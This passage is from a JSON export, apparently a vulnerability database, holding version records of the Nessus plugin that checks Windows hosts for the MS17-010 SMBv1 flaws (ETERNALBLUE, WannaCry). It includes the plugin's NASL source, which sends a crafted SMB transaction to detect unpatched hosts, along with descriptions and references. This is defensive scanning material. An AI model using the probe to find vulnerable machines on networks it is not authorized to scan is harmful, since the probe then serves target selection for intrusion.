script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: 
SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! 
get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. 
Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-10-16T07:45:32", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "MS17-010.NASL", "hash": "fb5d6541669f2547786f75e0f3909d00", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-03-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-29T01:33:11", "history": [], "viewCount": 7142, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0199"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "fireeye", "idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "avleonov", "idList": 
["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785189", "MYHACK58:62201786827", "MYHACK58:62201786816", "MYHACK58:62201785268", "MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785331"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}], "modified": "2021-07-29T01:33:11", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-29T01:33:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n 
script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # 
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: 
SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! 
get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. 
Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T01:33:11", "differentElements": ["cvelist", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "exploitableWith", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "MS17-010.NASL", "hash": "4e35886d67fc5235c64bbc01af40f3d3", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
